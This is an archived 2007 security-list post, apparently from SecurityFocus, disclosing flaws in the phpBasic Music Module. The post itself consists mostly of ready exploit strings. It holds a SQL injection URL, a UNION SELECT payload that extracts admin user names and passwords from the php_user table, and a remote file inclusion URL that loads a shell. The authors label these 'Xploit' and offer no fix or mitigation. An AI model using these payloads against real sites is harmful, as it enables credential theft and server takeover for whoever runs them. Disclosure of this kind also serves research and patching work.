[Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar Oct 23 2007 04:59PM
pete houston 17187 gmail com
Software : phpBasic Music Module

Homepage : http://phpbasic.com/

1. SQL Injection by Xcross87 :

Proof of concept :

http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]

Xploit admin user account :

http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,u
ser_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

2. RFI by Alucar

Xploit :

http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ===

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus